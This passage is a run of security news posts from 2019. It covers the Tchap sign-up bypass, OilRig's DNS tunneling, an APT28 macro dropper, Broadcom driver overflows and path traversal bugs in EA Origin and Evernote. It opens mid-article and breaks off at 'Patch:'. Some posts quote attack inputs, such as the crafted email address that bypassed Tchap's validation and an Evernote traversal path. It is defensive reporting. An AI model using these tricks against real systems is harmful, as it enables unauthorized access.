Fathi reported the flaw to Spotify on 13 October 2018, the company acknowledged it on October 16 and closed the flaw on November 1.

The bad news is that Shopify has not awarded the expert citing policy violations because the expert tested shops not created for testing purposes.

Below an excerpt of the email Shopify sent to the expert:

“While we appreciate you were trying to demonstrate the impact of the identified issue, intentionally accessing information of other merchants and not immediately reporting this to us is of significant concern to Shopify. As a result, this report will not be awarded a bug bounty.”

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

The post A flaw in Shopify API flaw exposed revenue and traffic data of thousands of stores appeared first on Security Affairs.

Security Affairs newsletter Round 210 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Attackers hacked support agent to access Microsoft Outlook email accounts
Major coordinated disinformation campaign hit the Lithuanian Defense
Romanian duo convicted of fraud Scheme infecting 400,000 computers
Security Affairs newsletter Round 209 – News of the week
Whatsapp, Instagram, Facebook down worldwide
A new DDoS technique abuses HTML5 Hyperlink Audit Ping in massive attacks
Apache fixed an important RCE flaw in Tomcat application server
Gnosticplayers round 5 – 65 Million+ fresh accounts from 6 security breaches available for sale
Gnosticplayers round 5 – 65 Million+ fresh accounts from 8 security breaches available for sale
Locked Shields 2019 – Chapeau, France wins Cyber Defence Exercise
Yellow Pencil WordPress Plugin flaw expose tens of thousands of sites
Adblock Plus filter can be exploited to execute arbitrary code in web pages
Blue Cross of Idaho data breach, 5,600 customers affected
CVE-2019-0803 Windows flaw exploited to deliver PowerShell Backdoor
Ecuador suffered 40 Million Cyber attacks after the Julian Assange arrest
FireEye releases FLASHMINGO tool to analyze Adobe Flash files
Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading
A new variant of HawkEye stealer emerges in the threat landscape
Code execution – Evernote
eGobbler hackers used Chrome bug to deliver 500Million+ ads to iOS users
European Commission is not in possession of evidence of issues with Kaspersky products
Justdial is leaking personal details of all customers real-time
RCE flaw in Electronic Arts Origin client exposes gamers to hack
Analyzing OilRigs malware that uses DNS Tunneling
APT28 and Upcoming Elections: evidence of possible interference (Part II)
Cisco addresses a critical bug in ASR 9000 series Routers
Drupal patched security vulnerabilities in Symfony, jQuery
Facebook ‘unintentionally collected contacts from 1.5 Million email accounts without permission
Russian TA505 threat actor target financial entities worldwide
Broadcom WiFi Driver bugs expose devices to hack
Facebook admitted to have stored millions of Instagram users passwords in plaintext
Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison
Ransomware attack knocks Weather Channel off the Air
Source code of tools used by OilRig APT leaked on Telegram
Avast, Avira, Sophos and other antivirus solutions show problems after
Google is going to block logins from embedded browsers against MitM phishing attacks
Hacker broke into super secure French Governments Messaging App Tchap hours after release
Marcus Hutchins pleads guilty to two counts of banking malware creation

Pierluigi Paganini

(SecurityAffairs – newsletter)



The post Security Affairs newsletter Round 210 – News of the week appeared first on Security Affairs.

Google is going to block logins from embedded browsers against MitM phishing attacks

Google this week announced that it is going to block login attempts from embedded browser frameworks to prevent man-in-the-middle (MiTM) phishing attacks.

Phishing attacks carried out by injecting malicious content in legitimate traffic are difficult to detect when attackers use an embedded browser framework or any other automated tool for authentication.

For example, the embedded browser framework Google offers Chromium Embedded Framework (CEF) that allows embedding Chromium-based browsers in other applications.

Google announced that starting from June, it will block sign-ins from these frameworks.

“However, one form of phishing, known as “man in the middle” (MITM), is hard to detect when an embedded browser framework (e.g., Chromium Embedded Framework – CEF) or another automation platform is being used for authentication. MITM intercepts the communications between a user and Google in real-time to gather the user’s credentials (including the second factor in some cases) and sign in.” reads a blog post published by Google. “Because we can’t differentiate between a legitimate sign in and a MITM attack on these platforms, we will be blocking sign-ins from embedded browser frameworks starting in June. This is similar to the restriction on webview sign-ins announced in April 2016.”

Google security MiTM

Google suggests developers currently using CEF for authentication to switch to the browser-based OAuth authentication.

The browser-based OAuth authentication also allows users to see the full URL of the page where they are entering their credentials, this could help them to avoid phishing websites mimicking legit ones.

“The solution for developers currently using CEF for authentication is the same: browser-based OAuth authentication. Aside from being secure, it also enables users to see the full URL of the page where they are entering their credentials, reinforcing good anti-phishing practices,” continues Google.

“If you are a developer with an app that requires access to Google Account data, switch to using browser-based OAuth authentication today.”

Pierluigi Paganini

(SecurityAffairs – hacking, MiTM phishing attack)

The post Google is going to block logins from embedded browsers against MitM phishing attacks appeared first on Security Affairs.

Hacker broke into super secure French Government’s Messaging App Tchap hours after release

A white hat hacker discovered how to break Tchap, a new secure messaging app launched by the French government for officials and politicians.

The popular French white hat hacker Robert Baptiste (aka @fs0c131y) discovered how to break into Tchap, a new secure messaging app launched by the French government for encrypted communications between officials and politicians.
The app was developed by DINSIC (Interministerial Directorate of Digital and Information System and Communication of the State), as a project controlled by France’s National Cybersecurity Agency (ANSSI).

It aims at replacing popular instant messaging services like Telegram and WhatsApp for government people.

The Tchap was launched on April 18 and is available on the official iOS and Android app stores, but only French government employees (using
@gouv.fr or @elysee.fr email accounts) can sign-up for an account.

The key point Tchap is that encrypted communications flow through internal servers to prevent cyber attacks carried out by foreign nation-state actors.

Anyway, the French government published Tchap’s source code on GitHub, it is based on Riot, a well-known open-source instant messaging client-server package.

News of the day is that Robert Baptiste found a security bug that could allow anyone to sign up an account with the Tchap app and access groups and channels without using an official government email account.

The expert made a dynamic analysis of the mobile app and discovered it implements certificate pinning in the authentication process. Even if he disables it with Frida, during the registration process, the app requests a token.

tchap

The expert noticed that depending on the email address provided by the user, the app will refer the “correct” id_server. The list of available servers is defined in the AndroidManifest.xml.

“I set id_server to matrix.agent.elysee.tchap.gouv.fr. For info, Elysée is the French presidential palace. As I choose this server I guessed I should have an @elysee.fr email address. So, in the requestToken request, I modified email to fs0c131y@protonmail.com@elysee.fr. Hum, no validation email in my inbox… Wait, maybe it is waiting a known @elysee.fr email address. So I did a Google search “email @elysee.fr”” wrote the expert in a blog post.

“So I did another try and in the requestToken request and I modified email to fs0c131y@protonmail.com@presidence@elysee.fr. Bingo! I received an email from Tchap, I was able to validate my account! “

The expert demonstrated how to create an account with the service using a regular email ID by exploiting a potential email validation vulnerability in the Android version of the Tchap app.

After he logged as an Elysée employee, he was able to access to the public rooms.

tchap app

Robert reported the issue the Matrix team who developed the Riot client, and it quickly fixed the bug and released a patch. The released patch was specific only to the application developed by French intelligence.

Just for curiosity, last week Matrix.org warned users of a security breach, a hacker gained unauthorized access to the production databases, including unencrypted message data, access tokens, and also password hashes.

According to Matrix.org, the attacker has exploited a known vulnerability in the Jenkins open source automation server to hijack credentials and gain access to the systems of the organization. Homeservers, source code and packages, identity servers, and Modular.im servers were not impacted.

Pierluigi Paganini

(SecurityAffairs – hacking, Tchap app)

The post Hacker broke into super secure French Government’s Messaging App Tchap hours after release appeared first on Security Affairs.

Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison

Djevair Ametovski was sentenced to 90 months in prison for operating an international cybercrime marketplace named Codeshop.

Macedonian national Djevair Ametovski (32) was sentenced to 90 months in prison by US DoJ authorities for operating an international cybercrime marketplace named Codeshop.

Codeshop.su was a website that specialized in selling stolen payment card data. Ametovski acquired payment card data from hackers who had stolen it from financial institutions and individuals.

According to the investigators, the man commercialized data of 181,000 payment cards between 2010 and 2014.

CodeShop carding

Ametovski (known online as Codeshop, Sindromx, xhevo, and Sindrom) was arrested by Slovenian authorities in January 2014, at the time he was charged with aggravated identity theft, access device fraud conspiracy, and wire fraud conspiracy. The Macedonian citizen was extradited to the United States in May 2016.

The man pleaded guilty to access device fraud and aggravated identity theft, he was also ordered to forfeit $250,000 and pay restitution that will be determined later.

Codeshop customers were able to buy stolen card data searching for specific types of data based on criteria such as country, bank, and bank identification number.

“The stolen data could then be used to make online purchases and to encode plastic cards to withdraw cash at ATMs.” reads the press release the Justice Department.      

“Ametovski used a network of online money exchangers and anonymous digital currencies, including Bitcoin, to reap revenues from the Codeshop website and to conceal all participants’ identities, including his own.  Over the course of the scheme, Ametovski obtained and sold stolen credit and debit card data for more than 1.3 million cards,” said the Justice Department.      

Pierluigi Paganini

(SecurityAffairs – Codeshop, carding)

The post Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison appeared first on Security Affairs.

Source code of tools used by OilRig APT leaked on Telegram

Lab Dookhtegan hackers leaked details about operations carried out by Iran-linked OilRig group, including source code of 6 tools.

A hacker group that goes online with the name Lab Dookhtegan have disclosed details about operations conducted by the Iran-linked cyber-espionage group tracked as OilRig, APT34, and HelixKitten.

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

The Lab Dookhtegan hackers used a Telegram channel to dump information about the OilRig infrastructure, revealing details about its hacking tools, members, and operations. The hackers also disclosed IP addresses and domains involved in operations conducted by the group over the years.

OilRig dump
Source ZDnet
OilRig dump
Source ZDnet

It seems that the tools have been leaked since mid-March on a Telegram channel by a user with the Lab Dookhtegan pseudonym.

The dump also includes OilRig victims’ data, including login credentials to several services obtained through phishing attacks.

The entity that leaked the information aimed at disrupting the operations of the Iran-linked hacking groups, it is likely an opponent of the Regime.

Lab Dookhtegan leaked the source code of the following six hacking tools, including data related on their contained in the compromised admin panels:

  • Glimpse (aka BondUpdater), the latest version of the PowerShell-based trojan;
  • PoisonFrog, an older version of BondUpdater;
  • HyperShell web shell (aka TwoFace);
  • HighShell web shell;
  • Fox Panel phishing tool;
  • Webmask, the main tool behind DNSpionage;

According to Chronicle, Dookhtegan leaked data from 66 victims in private industry and Government organizations, most from the Middle East, Africa, East Asia, and Europe.

The list of victims includes Etihad Airways and Emirates National Oil, hackers hit individuals in many industries including energy, transportation, and financial.

Lab Dookhtegan also doxxed Iranian Ministry of Intelligence officers, the leaked shared phone numbers, images, social media profiles, and names of officers involved with APT34 operations.

“We have more secret information about the crimes of the Iranian Ministry of Intelligence and its managers and we are determined to continue to expose them,” Dookhtegan said in a Telegram.

No doubt, the leak will have a severe impact on the future operations of the OilRig group.

Pierluigi Paganini

(SecurityAffairs – hacking, OilRig)

The post Source code of tools used by OilRig APT leaked on Telegram appeared first on Security Affairs.

Ransomware attack knocks Weather Channel off the Air

A ransomware attack knocked the Weather Channel off the air for at least 90 minutes Thursday morning, federal law enforcement are investigating the incident.A ranomware attack knocked the Weather Channel off the air for at least 90 minutes Thursday morning, federal law enforcement are investigating the incident.

A cyber attack hit the Weather Channel and forced it off the air for at least 90 minutes.

The broadcaster confirmed via Twitter that the incident is the result of a cyber attack, it claims that the problems were caused by “a malicious software attack on the network.”

Details are scant at the moment and a tweet from the station does not lift the haze, informing only that it was the victim of “a malicious software attack on the network.”

This morning the broadcaster transmitted a taped programming “Heavy Rescue” instead of the “AMHQ” live show.

The live show started more than 90 minutes later and the anchors informing viewers of the cyber attack. IT staff has restored the normal operations using the backups.

Weather Channel ransomware

Federal law enforcement has immediately started an investigation on the case, at the time The Weather Channel did not disclose technical details about the attack.

According to 11 Alive News, the attack was caused by ransomware, a circumstance confirmed by Feds to The Wall Street Journal. The live show was interrupted due to a ransomware attack, likely an attempt to extort money to from the broadcaster.

Ransomware attacks continue to represent a serious threat for companies and organizations, it is essential to adopt good cyber hygiene using defence software, having up to date applications and implementing an efficient backup policy.

Pierluigi Paganini

(SecurityAffairs – ransomware, Wheater Channel)




The post Ransomware attack knocks Weather Channel off the Air appeared first on Security Affairs.

Broadcom WiFi Driver bugs expose devices to hack

Experts warn of security flaws in the Broadcom WiFi chipset drivers that could allow potential attackers to remotely execute arbitrary code and to trigger DoS.

According to a DHS/CISA alert and a CERT/CC vulnerability note, Broadcom WiFi chipset drivers are affected by security vulnerabilities impacting multiple operating systems. The flaws could be exploited to remotely execute arbitrary code and to trigger a denial-of-service condition.

“The CERT Coordination Center (CERT/CC) has released information on multiple vulnerabilities in Broadcom Wi-Fi chipset drivers. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.” reads the alert published by the DHS/CISA.

“The Broadcom wl driver and the open-source brcmfmac driver for Broadcom WiFi chipsets contain multiple vulnerabilities. The Broadcom wl driver is vulnerable to two heap buffer overflows, and the open-source brcmfmac driver is vulnerable to a frame validation bypass and a heap buffer overflow.” reads the security advisory published by the CERT/CC.

The CERT/CC vulnerability note includes a list of all vendors potentially impacted by the flaws in Broadcom WiFi chipsets.

The flaws were discovered by Hugues Anguelkov during his internship at Quarkslab are tracked as CVE-2019-8564, CVE-2019-9500, CVE-2019-9501, CVE-2019-9502, CVE-2019-9503.

The heap buffer overflows could be exploited to execute arbitrary code on vulnerable systems.

“You can find these chips almost everywhere from smartphones to laptops, smart-TVs and IoT devices. You probably use one without knowing it, for example if you have a Dell laptop, you may be using a bcm43224 or a bcm4352 card. It is also likely you use a Broadcom WiFi chip if you have an iPhone, a Mac book, a Samsumg phone or a Huawei phone, etc.” reads the post published by Anguelkov.

“Since these chips are so widespread they constitute a high value target to attackers and any vulnerability found in them should be considered to pose high risk.”

broadcom-wifi chipset

According to the CERT/CC,
In the worst case scenario, by sending specially-crafted WiFi packets, a remote, unauthenticated attacker may be able to execute arbitrary code on a vulnerable system. More typically, these vulnerabilities will result in denial-of-service attacks.
a remote and unauthenticated attackers could exploit the flaws in Broadcom WiFi chipset driver by sending maliciously-crafted WiFi packets to execute arbitrary code on vulnerable systems.

Anguelkov confirmed that two of those vulnerabilities affect both in the Linux kernel and firmware of affected Broadcom chips.

The researcher pointed out that the most common exploitation scenario leads to a remote denial of service.

“Although it is technically challenging to achieve, exploitation for remote code execution should not be discarded as the worst case scenario.” Anguelkov adds.

Below the details for the flaws:

Vulnerabilities in the open source brcmfmac driver:
• CVE-2019-9503: If the brcmfmac driver receives the firmware event frame from the host, the appropriate handler is called. It is possible to bypass frame validation by using the USB as a bus (for instance by a wifi dongle.). In this case, firmware event frames from a remote source will be processed.

CVE-2019-9500: a malicious event frame can be crafted to trigger an heap buffer overflow in the brcmf_wowl_nd_results function when the Wake-up on Wireless LAN functionality is configured. This flaw could be exploited by compromised chipsets to compromise the host, or when used in combination with the above frame validation bypass, can be used remotely.

Vulnerabilities in the Broadcom wl driver:
Two heap buffer overflows can be triggered in the client when parsing an EAPOL message 3 during the 4-way handshake from the access point (AP).
• 
CVE-2019-9501: supplying a vendor information element with a data length larger than 32 bytes, a heap buffer overflow is triggered in wlc_wpa_sup_eapol.
• 
CVE-2019-9502: If the vendor information element data length is larger than 164 bytes, a heap buffer overflow is triggered in wlc_wpa_plumb_gtk.
NOTE: When the wl driver is used with SoftMAC chipsets, these vulnerabilities are triggered in the host’s kernel. When a FullMAC chipset is being used, these vulnerabilities would be triggered in the chipset’s firmware.

The researcher published a timeline for the vulnerabilities that include information on patches released by some vendors.

Pierluigi Paganini

(SecurityAffairs – hacking, Broadcom WiFi chipset)

The post Broadcom WiFi Driver bugs expose devices to hack appeared first on Security Affairs.

Analyzing OilRig’s malware that uses DNS Tunneling

Iran-linked APT group OilRig is heavily leveraging on DNS tunneling for its cyber espionage campaigns, Palo Alto Networks reveals.

Security researchers at Palo Alto Networks reported that Iran-linked APT group OilRig is heavily leveraging on DNS tunneling for its cyber espionage campaigns, Palo Alto Networks reveals.

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

Many of the malware used by the group in the attacks over the years use DNS tunneling to protect communications with the command and control (C&C) infrastructure.

Experts pointed out that DNS tunneling clearly represents one of the preferred communication methods of the group.

OilRig usage of DNS tunneling was first documented in 2016, some of the Trojans in its arsenal using it are Helminth, ISMAgent, QUADAGENT
BONDUPDATER, and ALMACommunicator.

DNS tunnelling OilRig

The analysis of the tunneling protocols used by the OilRig suggests:

  • All subdomains contain a randomly generated value to avoid the DNS query resulting in a cached response
  • Most rely on an initial handshake to obtain a unique system identifier
  • Most rely on hardcoded IP addresses within the DNS answers to start and stop data transfer
  • Data upload includes a sequence number that allows the C2 to reconstruct the uploaded data in the correct order
  • Depending on the tool, A, AAAA, and TXT query types have been used by OilRig for tunneling
  • All of the DNS tunneling protocols will generate a significant number of DNS queries

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.” reads the analysis published by Palo Alto Networks. “Therefore, the protocols must abide by the DNS protocol, so the specially crafted subdomains must have labels (portions of the subdomain separated by periods) must start and end with a letter or digit, contain letters, digits and hyphens and be less than 63 characters in length. Also, the entire domain queried, which includes the C2 domain and the specially crafted subdomain cannot exceed 253 characters.”

All the tools leverage DNS queries to resolve specially crafted subdomains and send data to the command and control servers. The tools use protocols in different ways, they differ for the structure of the subdomains queried, for the data received by the Trojans, for the subdomains used to transmit data.

Experts observed multiple variants of the Helminth backdoor over the years all using the same DNS Type A, but the threat actors are able to change the generated subdomains to avoid detection.

“There are several variants of Helminth, as the OilRig actors actively developed this Trojan during the course of their attack campaigns. The Helminth Trojan came in two forms, a portable executable version and a PowerShell version, both of which received updates to their DNS tunneling protocol over time.” continues the analysis. “The DNS tunneling protocols used in each variant operated the same way, but the developer would make changes to the generated subdomains to make them look visually different to evade detection.”

OilRig also used the ISMAgent in many campaigns, the malware uses the DnsQuery_A API function to issue DNS AAAA requests to resolve custom subdomains. Before transmitting the data, the Trojan issues a beacon to inform the server it is ready.

OilRig also leveraged two variants of the ALMA Communicator in its attacks, each of them using a different domain structure. The two variants sent different information to the server and the formatted data within the DNS tunneling protocol in different ways.

Palo Alto researchers also documented different variants of both the BONDUPDATER tool and QUADAGENT Trojan, the latter uses AAAA queries to transmit/receive data via DNS tunneling.

“This threat group saw the benefits of using DNS tunneling, as DNS is almost universally allowed through security devices.” Palo Alto Networks concludes. “One major drawback of using DNS tunneling is the high volume of DNS queries issued to transmit data back and forth between the tool and the C&C server, which may stand out to those monitoring DNS activity on their networks,”

Pierluigi Paganini

(SecurityAffairs – hacking, OilRig)

The post Analyzing OilRig’s malware that uses DNS Tunneling appeared first on Security Affairs.

This Week in Security News: Medical Malware and Monitor Hacks

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how baby monitors may be susceptible to hacking. Also, learn about a medical flaw that enables hackers to hide malware.

Read on:

Is Your Baby Monitor Susceptible to Hacking?

In a number of high-profile cases, home surveillance cameras have been easily compromised and disturbing reports of hacked baby monitors are in the news. 

 

Global Governments Demonstrate Rising Commitment to Cybersecurity

According to the International Telecommunications Union’s (ITU) 2018 Global Cybersecurity Index, only half of countries around the globe had a government cybersecurity strategy in 2017, which rose to 58 percent in 2018.

What Did We Learn from the Global GPS Collapse?

The problem highlights the pervasive disconnect between the worlds of IT and OT.

Malware Creates Cryptominer Botnet Using EternalBlue and Mimikatz

A malware campaign is actively attacking Asian targets using the EternalBlue exploit and taking advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to drop Trojans and a Monero coinminer on compromised machines.

Medical Format Flaw Can Let Attackers Hide Malware in Medical Images

Research into DICOM has revealed that the medical file format in medical images has a flaw that can give threat actors a new way to spread malicious code through these images.

Hackers Could Read Your Hotmail, MSN, and Outlook Emails by Abusing Microsoft Support

A hacker or group of hackers broke into a customer support account for Microsoft, and then used that to gain access to information related to customers’ email accounts such as the subject lines of their emails and who they’ve communicated with.

New Business Email Compromise Scheme Reroutes Paycheck by Direct Deposit

A new business email compromise (BEC) scheme, where the attacker tricks the recipients into rerouting paychecks by direct deposit, has emerged.

Leadership Turnover at DHS and Secret Service Could Hurt US Cybersecurity Plans

Departures of top officials at the Secret Service and Department of Homeland Security (DHS) will add to an already difficult public-private disconnect on cybersecurity, especially since Kirstjen Nielsen has a rare set of cybersecurity skills that helped the DHS protect companies in critical industries.

Microsoft Disclosed Security Breach From Compromised Support Agent’s Credentials

Microsoft has notified affected Outlook users of a security breach that allowed hackers access to email accounts from January 1 to March 28, 2019.

Do you think the leadership turnover at DHS and the Secret Service will hurt US cybersecurity plans? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Medical Malware and Monitor Hacks appeared first on .

APT28 and Upcoming Elections: evidence of possible interference (Part II)

In mid-March, a suspicious Office document referencing the Ukraine elections appeared in the wild, is it related to APT28 and upcoming elections?

Introduction

The uncertain attribution of the Ukrainian themed malicious document discussed in our past article “APT28 and Upcoming Elections: Possible Interference Signals”, led us to a review of Sofacy’s phishing techniques to confirm or deny the possible involvement of Russian state-sponsored actors in the election interference. We ended up in an old fake Hotel reservation request form, containing dummy interactive text boxes used to lure the victims to enable the macro code execution. 

We analyzed this sample two years ago and we linked it to a Sofacy attack operation discovered by FE researchers in the mid of 2017, which hit several hotels in European and Middle Eastern countries. 

Technical Analysis

Sha256a4a455db9f297e2b9fe99d63c9d31e827efb2cda65be445625fa64f4fce7f797
ThreatAPT28 GAMEFISH
Brief DescriptionGAMEFISH document dropper (reference sample, 2017)
Ssdeep1536:009J0E4v13p/gL7Jj4P9bvzKGXpIiUvh23oKRO/HhcKmFoR:fb4v13pYL7J49bvr5Iias32Jc5FoR

The macro code inside the 2017 document is password protected, just like the last suspicious document we analyzed to investigate a possible Ukraine elections interference by Russian groups. After its opening, the reference sample decodes the extracted Base64 content using a custom “DecodeBase64” function:

Figure 1: Custom Base64 decryption routine

The decoded content is actually a DLL file which is written into “%AppData%\user.dat”. After that, it will be executed through an ASR bypass technique (Attack Surface Reduction) allowing attackers to run new child process within the Office environment. This is the same publicly available exploit previously found into the Ukrainian sample (more details in the next section). 

Figure 2: Technique used to bypass Microsoft ASR protection

In this reference sample, the “user.dat”’s purpose is to create two new artifacts and to set persistence through “HKCU\Environment->UserInitMprLogonScript”. The created files are:

  • %AppData%\mrset.bat
  • %AppData%\mvtband.dat
Figure 3: Persistence setting and artifacts creation by “user.dat” file

The “mrset.bat” file is a short bash file, designed to check the “mvtband.dat” existence and to run it through “rundll32.exe” system utility.

Figure 4: “mrset.bat” file code

Finally, the “mvtband.dat” file, which actually is a Delphi DLL library, is a well-known malware named “GAMEFISH” (f9fd3f1d8da4ffd6a494228b934549d09e3c59d1). Russian groups were used to use it in recon-phases to steal information from victim machine and to implant new payloads. 

Figure 5: Information retrieved by mvtband.dll

Comparison with Ukrainian Elections Sample

Sha256 a4a455db9f297e2b9fe99d63c9d31e827efb2cda65be445625fa64f4fce7f797
Threat APT28 GAMEFISH
Brief Description GAMEFISH document dropper (reference sample, 2017)
Ssdeep 1536:009J0E4v13p/gL7Jj4P9bvzKGXpIiUvh23oKRO/HhcKmFoR:fb4v13pYL7J49bvr5Iias32Jc5FoR

Despite some differences between the “Hospitality campaign” vector and the Ukraine elections one, both use similar TTP related to the APT28 group. The link between Hospitality malware and the “FancyBear” actor has been already sifted by Info-Sec community. So, we can exploit the similarities between it and the Ukrainian elections sample to link it to Russian hacker groups.

Both documents under analysis use protected macro code. All the code inside the macro is not obfuscated in any way: Hospitality document surprisingly contains code comments too. Moreover, the main macro function name is “Execute” for both documents and the ASR trick used to create new processes from the Office work-space is substantially the same.

Figure 6. The Ukraine elections macro on the left; Hospitality’s one on the right.

In both cases the real payload is encoded in Base64 and it is stored into an Office hidden section: the first sample uses a document property, the second one employs an XML resource. 

The next stages are different: the Ukraine sample deploys some Powershell obfuscated scripts, which at the end carry an Empire stager, allowing the attackers to directly interact with the victim machine; the reference sample, instead, implants the GAMEFISH malware which automatically exfiltrates victim information while waiting for new payloads to install.

Conclusion

Finally, the attribution of the Ukraine elections sample (highlighted in our previous report) can be confirmed due to the strong similarities with the first stage of the Sofacy’s Hospitality malware, because:

  • Both use password protection.
  • Both have the same function name.
  • Both have the same macro code structure.
  • Both embeds the real payload in a hidden document section.
  • The ASR trick is implemented using the same instructions.

The presence of these similarities between the droppers indicates, with high probability, the attacker is the same and consequentially suggests APT28 is reusing some 2017 tricks and code snippets which, despite their simplicity, make their attacks effective.

Further details, including Indicators of Compromise and Yara rules, are reported in the analysis published on the Yoroi Blog.
Stay Tuned.  

Pierluigi Paganini

(SecurityAffairs – Ukraine, APT28)

The post APT28 and Upcoming Elections: evidence of possible interference (Part II) appeared first on Security Affairs.

New DNS Hijacking Attacks

DNS hijacking isn't new, but this seems to be an attack of unprecedented scale:

Researchers at Cisco's Talos security division on Wednesday revealed that a hacker group it's calling Sea Turtle carried out a broad campaign of espionage via DNS hijacking, hitting 40 different organizations. In the process, they went so far as to compromise multiple country-code top-level domains -- the suffixes like .co.uk or .ru that end a foreign web address -- putting all the traffic of every domain in multiple countries at risk.

The hackers' victims include telecoms, internet service providers, and domain registrars responsible for implementing the domain name system. But the majority of the victims and the ultimate targets, Cisco believes, were a collection of mostly governmental organizations, including ministries of foreign affairs, intelligence agencies, military targets, and energy-related groups, all based in the Middle East and North Africa. By corrupting the internet's directory system, hackers were able to silently use "man in the middle" attacks to intercept all internet data from email to web traffic sent to those victim organizations.

[...]

Cisco Talos said it couldn't determine the nationality of the Sea Turtle hackers, and declined to name the specific targets of their spying operations. But it did provide a list of the countries where victims were located: Albania, Armenia, Cyprus, Egypt, Iraq, Jordan, Lebanon, Libya, Syria, Turkey, and the United Arab Emirates. Cisco's Craig Williams confirmed that Armenia's .am top-level domain was one of the "handful" that were compromised, but wouldn't say which of the other countries' top-level domains were similarly hijacked.

Another news article.

Russian TA505 threat actor target financial entities worldwide

Russian financially motivated threat actor TA505 used remote access Trojans (RATs) in attacks on financial entities in the United States and worldwide.

Security experts at CyberInt uncovered a new campaign of a Russian financially motivated threat actor tracked as TA505. The hackers used remote access Trojans (RATs) in attacks aimed at financial entities in the United States and worldwide.

“CyberInt researchers have been tracking various activities following the spear-phishing campaign targeting large US-based retailers detected in December 2018.” reads the analysis published by Cyberint. “The research focused on scenarios with the same tactics, techniques and procedures (TTP) along with the repeated nefarious use of a ‘legitimate’ remote administration tool ‘Remote Manipulator System’ (RMS), developed by a Russianbased company ‘TektonIT’.”

The TA505 group was first spotted by Proofpoint back 2017, it has been active at least since 2015 and targets organizations in financial and retail industries.

The group carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including 
the Dridex banking trojantRAT RAT, FlawedAmmy RAT, 
Philadelphia ransomware, GlobeImposter and Locky ransomware.

Tracked by the research community as TA505, the Russian threat group is known for the use of banking Trojans such as Shifu and Dridex, as well as for the massive Locky ransomware campaigns observed several years ago.

In recent attacks the experts observed the group using new backdoors, including the modular tRat and ServHelper.

In campaigns carried out between December 2018 and February 2019, the TA505 group leveraged the Remote Manipulator System (RMS) backdoor to target financial institutions in Chile, India, Italy, Malawi, Pakistan and South Korea, and retailers in the United States.

In December 2018 also targeted large US retailers and organizations in the food and beverage industry with spear-phishing attacks. The phishing messages used a weaponized Word document containing a Visual Basic for Applications (VBA) macr. The macro downloads a payload from the command and control (C&C) server, the last stage of the attack chain is the RMS RAT.

The investigation conducted by the researchers allowed them to uncover other campaigns conducted between December 2018 and March 2019.

Hackers hit targets in many countries worldwide, including Chile, India, Italy, Malawi, Pakistan and South Korea. Researchers believe that other attacks against targets in China, Great Britain, France and the United States could be attributed to the same threat actor.

The weaponized documents used in the attacks leverage Microsoft Windows Installer to fetch a payload from the C2 and execute it.

“This behaviour is consistent with other TA505 campaigns utilising a combination of weaponised Microsoft Office files containing either VBA macros or exploit code to spawn additional processes.” continues the analysis published by Cyberint. “Of the spreadsheet lures analysed in this campaign, four different C2 servers and payloads were identified, with each likely being unique to a specific target organization or victim cluster.”

Experts also observed the attackers using the ServHelper RAT since November 2018, it allows them to set up reverse SSH tunnels for remote access to the compromised machine via RDP.

TA505

The report states that indicators of compromise identified in the campaigns against the US retail campaign are consistent with an attack against the Notary Chamber of Ukraine conducted by the same threat actor in December 2018.

At the time, the threat actor was delivering the RMS Trojan in spear-phishing attack.

Further technical details on the attacks are included in the report published by Cyberint.

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

The post Russian TA505 threat actor target financial entities worldwide appeared first on Security Affairs.

RCE flaw in Electronic Arts Origin client exposes gamers to hack

Electronic Arts (EA) has fixed a security issue in the Windows version of its gaming client Origin that allowed hackers to remotely execute code on an affected computer.

Electronic Arts (EA) has addressed a vulnerability in the Windows version of its gaming client Origin that allowed hackers to remotely execute code on an affected computer.

Electronic Arts already released a security patch for the remote code execution vulnerability. The Origin app on Windows is used by tens of millions of gamers. The Origin client for macOS was not affected by this flaw.

The flaw was reported by security experts Dominik Penner and Daley Bee from Underdog Security.

“We located a client-sided template injection, where we proceeded to use an AngularJS sandbox escape and achieve RCE by communicating with QtApplication’s QDesktopServices.” reads a blog post published by
Underdog Security.

“To make it easier to access an individual game’s store from the web, the client has its own URL scheme that allows gamers to open the app and load a game from a web page by clicking a link with origin:// in the address.” reported Techcrunch.

“But two security researchers, Daley Bee and Dominik Penner of Underdog Security, found that the app could be tricked into running any app on the victim’s computer.”

The experts shared a proof-of-concept code with Techcrunch to trigger the issue.

Researchers pointed out that the code allowed any app to run at the same level of privileges as the logged-in user. In the following image, the security duo popped open the Windows calculator remotely.

Electronic Arts Origin client

“But worse, a hacker could send malicious PowerShell commands, an in-built app often used by attackers to download additional malicious components and install ransomware.” continues the post.

An attacker could craft a malicious link and send it via email to the victims or include it on a webpage, the issue could also be triggered if the malicious code was combined with cross-site scripting exploit that ran automatically in the browser.

The flaw can also be exploited by an attacker to take over gamers’ accounts by stealing access token with just a single line of code.

Pierluigi Paganini

(SecurityAffairs – hacking, Electronic Arts)

The post RCE flaw in Electronic Arts Origin client exposes gamers to hack appeared first on Security Affairs.

Code execution – Evernote

A local file path traversal issue exists in Evernote 7.9 for macOS which allows an attacker to execute arbitrary programs.

Technical observation:
A crafted URI can be used in a note to perform this attack using file:/// as an argument or by traversing to any directory like
(../../../../something.app).

Since Evernote also has a feature of sharing notes, in such a case an attacker could leverage this vulnerability and send crafted notes (.enex) to the victim to perform further attacks.

Evernote

Patch: 
